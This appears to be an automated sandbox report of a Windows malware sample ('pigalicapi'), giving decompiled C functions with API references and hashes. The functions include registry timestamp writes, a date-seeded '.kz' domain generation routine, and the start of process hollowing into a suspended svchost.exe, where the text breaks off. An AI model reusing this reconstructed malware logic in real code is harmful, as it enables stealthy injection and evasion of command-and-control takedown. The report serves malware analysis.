                                                                                                                                                                                                                                                                            0x007b7301

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 007B72BD
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 007B72F9
                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 007B7329
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 007B7343
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 007B73A9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8b819aa9944911f4d764d38e6eb39f6ad871b32e342e31337e62ee9f7f3e66c7
                                                                                                                                                                                                                                                                            • Instruction ID: 8273026edad71b23a487aadd9658aaba69f6d83aa7b22ddd226944f72940581b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b819aa9944911f4d764d38e6eb39f6ad871b32e342e31337e62ee9f7f3e66c7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F4149B4A04208EFDB08DF94C885BEEBBB5BF88300F14C55CE915AB291D779A944CF94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B73C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                                                            				char* _t26;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                            						_v20 = E007B16F0(_a8, _a12);
                                                                                                                                                                                                                                                                            						_t26 =  *0x7c18a0; // 0x7c3b88
                                                                                                                                                                                                                                                                            						_v8 = _t26;
                                                                                                                                                                                                                                                                            						E007B7D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                            						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                            						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                            						if(( *0x7c435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                                                                                                                            						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                            						if(_t24 == 0) {
                                                                                                                                                                                                                                                                            							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                            							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                            							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x007b73ca
                                                                                                                                                                                                                                                                            0x007b73e4
                                                                                                                                                                                                                                                                            0x007b73eb
                                                                                                                                                                                                                                                                            0x007b7401
                                                                                                                                                                                                                                                                            0x007b7404
                                                                                                                                                                                                                                                                            0x007b7409
                                                                                                                                                                                                                                                                            0x007b7414
                                                                                                                                                                                                                                                                            0x007b7429
                                                                                                                                                                                                                                                                            0x007b7432
                                                                                                                                                                                                                                                                            0x007b7442
                                                                                                                                                                                                                                                                            0x007b7444
                                                                                                                                                                                                                                                                            0x007b7444
                                                                                                                                                                                                                                                                            0x007b744b
                                                                                                                                                                                                                                                                            0x007b7465
                                                                                                                                                                                                                                                                            0x007b746d
                                                                                                                                                                                                                                                                            0x007b7473
                                                                                                                                                                                                                                                                            0x007b748b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b7495
                                                                                                                                                                                                                                                                            0x007b746d
                                                                                                                                                                                                                                                                            0x007b73eb
                                                                                                                                                                                                                                                                            0x007b749e

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 007B7429
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 007B7465
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 007B7473
                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 007B748B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 007B7495
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                            • Opcode ID: f5ada3175049642d08ff792e22ec5e8edc069ae676cfcaa8c186b85f1870289c
                                                                                                                                                                                                                                                                            • Instruction ID: 36f7ab9f3fe0d2efdf9dab76a4c0e491380e0bdcbddc50cf9addc6e9336c447c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5ada3175049642d08ff792e22ec5e8edc069ae676cfcaa8c186b85f1870289c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF2130B5900208EFDB14DF94DC49FFE7B78BB88701F44C558F911AA181D7B89A44CB55
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B9650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                                            				signed char _v25;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                            					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                            						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                            						E007B7D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                            						E007B9560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                            						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                            						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                            						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                            						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                            						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x007b9656
                                                                                                                                                                                                                                                                            0x007b9661
                                                                                                                                                                                                                                                                            0x007b9685
                                                                                                                                                                                                                                                                            0x007b9696
                                                                                                                                                                                                                                                                            0x007b9699
                                                                                                                                                                                                                                                                            0x007b96b1
                                                                                                                                                                                                                                                                            0x007b96bc
                                                                                                                                                                                                                                                                            0x007b96cf
                                                                                                                                                                                                                                                                            0x007b96d4
                                                                                                                                                                                                                                                                            0x007b96df
                                                                                                                                                                                                                                                                            0x007b96ef
                                                                                                                                                                                                                                                                            0x007b96f8
                                                                                                                                                                                                                                                                            0x007b96f8
                                                                                                                                                                                                                                                                            0x007b970a
                                                                                                                                                                                                                                                                            0x007b9712
                                                                                                                                                                                                                                                                            0x007b9712
                                                                                                                                                                                                                                                                            0x007b971f
                                                                                                                                                                                                                                                                            0x007b971f
                                                                                                                                                                                                                                                                            0x007b9728

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B9690
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 007B96DF
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B96E9
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B9701
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B9719
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 493641738-0
                                                                                                                                                                                                                                                                            • Opcode ID: 20e47e4907ce41f55908b2384bd4e6bb2810b625c0609592b4dff8f6a0549e23
                                                                                                                                                                                                                                                                            • Instruction ID: 962f290f588ef70771f3eeeaca233a429ad2668ef926ef49e368263aa59002cf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20e47e4907ce41f55908b2384bd4e6bb2810b625c0609592b4dff8f6a0549e23
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0214C70900249EFCF15DFA4D888BEE7BB5FF44304F188548FA14A7241D778AA54CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B92E0(intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				char _v172;
                                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                            					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                            					_t46 = E007B97E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                            					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                            					_t8 =  &_a12; // 0x7b44ef
                                                                                                                                                                                                                                                                            					_v12 = _t46 +  *_t8;
                                                                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                                                                            					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                            						E007B7D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                            						_t50 = E007B8BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                            						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                            						_v40 = _t50;
                                                                                                                                                                                                                                                                            						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                            							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v12 = _v172;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                            						E007B9650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                            						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                            						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                            						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x007b92e9
                                                                                                                                                                                                                                                                            0x007b92f4
                                                                                                                                                                                                                                                                            0x007b9308
                                                                                                                                                                                                                                                                            0x007b931d
                                                                                                                                                                                                                                                                            0x007b9322
                                                                                                                                                                                                                                                                            0x007b9325
                                                                                                                                                                                                                                                                            0x007b9328
                                                                                                                                                                                                                                                                            0x007b932b
                                                                                                                                                                                                                                                                            0x007b933d
                                                                                                                                                                                                                                                                            0x007b9357
                                                                                                                                                                                                                                                                            0x007b9371
                                                                                                                                                                                                                                                                            0x007b9376
                                                                                                                                                                                                                                                                            0x007b9379
                                                                                                                                                                                                                                                                            0x007b9380
                                                                                                                                                                                                                                                                            0x007b9396
                                                                                                                                                                                                                                                                            0x007b9382
                                                                                                                                                                                                                                                                            0x007b9388
                                                                                                                                                                                                                                                                            0x007b9388
                                                                                                                                                                                                                                                                            0x007b93a8
                                                                                                                                                                                                                                                                            0x007b93c4
                                                                                                                                                                                                                                                                            0x007b93c9
                                                                                                                                                                                                                                                                            0x007b93db
                                                                                                                                                                                                                                                                            0x007b93e7
                                                                                                                                                                                                                                                                            0x007b93f0
                                                                                                                                                                                                                                                                            0x007b933a
                                                                                                                                                                                                                                                                            0x007b933a
                                                                                                                                                                                                                                                                            0x007b933d
                                                                                                                                                                                                                                                                            0x007b93fe

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 007B9308
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B8BFF
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: GetLastError.KERNEL32 ref: 007B8C09
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8C38
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 007B8C59
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 007B8C71
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 007B8C99
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 007B8CC1
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 007B8CD5
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8CE1
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,.kz), ref: 007B93DB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                            • String ID: .kz$D{
                                                                                                                                                                                                                                                                            • API String ID: 2740484991-2219800579
                                                                                                                                                                                                                                                                            • Opcode ID: d2be0e4a01042f960ccb78bce6754fcbb101c51fcb9edb398fd0783d8ee490d6
                                                                                                                                                                                                                                                                            • Instruction ID: bb617b15cfffb6a8bc581351b03ca0187e9311c309414efbe4d1e378d0c88be5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2be0e4a01042f960ccb78bce6754fcbb101c51fcb9edb398fd0783d8ee490d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84310DB1E00209EBDF04DF94C885BEEB7B5EF58304F108159E615A7281E738AA85CB55
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                                                                            			E007B78D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                            						_t31 = E007B7B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                                                                            						L007BB1EC();
                                                                                                                                                                                                                                                                            						_v20 = _t31;
                                                                                                                                                                                                                                                                            						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                            						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v5 = 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x007b78d6
                                                                                                                                                                                                                                                                            0x007b78de
                                                                                                                                                                                                                                                                            0x007b78f8
                                                                                                                                                                                                                                                                            0x007b790a
                                                                                                                                                                                                                                                                            0x007b7922
                                                                                                                                                                                                                                                                            0x007b792d
                                                                                                                                                                                                                                                                            0x007b792e
                                                                                                                                                                                                                                                                            0x007b7933
                                                                                                                                                                                                                                                                            0x007b795a
                                                                                                                                                                                                                                                                            0x007b7960
                                                                                                                                                                                                                                                                            0x007b7907
                                                                                                                                                                                                                                                                            0x007b7907
                                                                                                                                                                                                                                                                            0x007b7965
                                                                                                                                                                                                                                                                            0x007b7965
                                                                                                                                                                                                                                                                            0x007b796f

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                            • String ID: %s:%u
                                                                                                                                                                                                                                                                            • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                            • Opcode ID: 2a31f0d125921a2a725545c2a5b731950fa708f7794748c841fef12d34293f36
                                                                                                                                                                                                                                                                            • Instruction ID: 048f8c6b95910386bb851e3cd017a99e260538d49cd14802f5afb1e47fa3e74b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a31f0d125921a2a725545c2a5b731950fa708f7794748c841fef12d34293f36
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4511607190820CEBDF08CF98C995BEDB7B4EB90304F04C28DE915AB281D379E645CB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B1E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                            				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					E007B7D20(E007B7D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                            					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                            					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                            						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                            						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x007b1e66
                                                                                                                                                                                                                                                                            0x007b1e71
                                                                                                                                                                                                                                                                            0x007b1e8b
                                                                                                                                                                                                                                                                            0x007b1e93
                                                                                                                                                                                                                                                                            0x007b1ebc
                                                                                                                                                                                                                                                                            0x007b1ec2
                                                                                                                                                                                                                                                                            0x007b1ecb
                                                                                                                                                                                                                                                                            0x007b1ecb
                                                                                                                                                                                                                                                                            0x007b1ebc
                                                                                                                                                                                                                                                                            0x007b1ed4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007B1EB4
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 007B1EC2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                            • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                            • Opcode ID: 2bd52c48851ee22f11e551f19f1677a81a0436c072bfb35a6d9f33d39fd49ddf
                                                                                                                                                                                                                                                                            • Instruction ID: 1c1a8dd9689208c005f62078ae0b13317fd2f721fc845362368a4e1f39c7c2f3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bd52c48851ee22f11e551f19f1677a81a0436c072bfb35a6d9f33d39fd49ddf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54013675A4430CEBDB10DF94DD49FEE77B9AB44704F544518FA086B2C0D7749A14C7A1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                                                                            			E04001F80(intOrPtr _a4, signed char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                                                            				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                            				intOrPtr _v1016;
                                                                                                                                                                                                                                                                            				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                            				intOrPtr _v1096;
                                                                                                                                                                                                                                                                            				void _v1100;
                                                                                                                                                                                                                                                                            				signed int _v1104;
                                                                                                                                                                                                                                                                            				void* _t121;
                                                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                                                            				int _t130;
                                                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                                                            				int _t140;
                                                                                                                                                                                                                                                                            				int _t143;
                                                                                                                                                                                                                                                                            				int _t145;
                                                                                                                                                                                                                                                                            				int _t148;
                                                                                                                                                                                                                                                                            				void* _t180;
                                                                                                                                                                                                                                                                            				void* _t263;
                                                                                                                                                                                                                                                                            				void* _t265;
                                                                                                                                                                                                                                                                            				void* _t266;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                                                                                                                            					L26:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                            				_t121 =  *0x400304c( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                            				if(_a12 != 0) {
                                                                                                                                                                                                                                                                            					 *0x400304c( &_v276, " ");
                                                                                                                                                                                                                                                                            					_t121 =  *0x400304c( &_v276, _a12);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E04001260(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                            				E04001260( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                            				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                            				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                            				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                            				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                            				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                            				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            				_v12 = _t128;
                                                                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                                                                            					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                            					if(_t130 != 0) {
                                                                                                                                                                                                                                                                            						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            						_v1100 = _t132;
                                                                                                                                                                                                                                                                            						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                            							L10:
                                                                                                                                                                                                                                                                            							E04001310(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                            							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                            							_v1104 = 0;
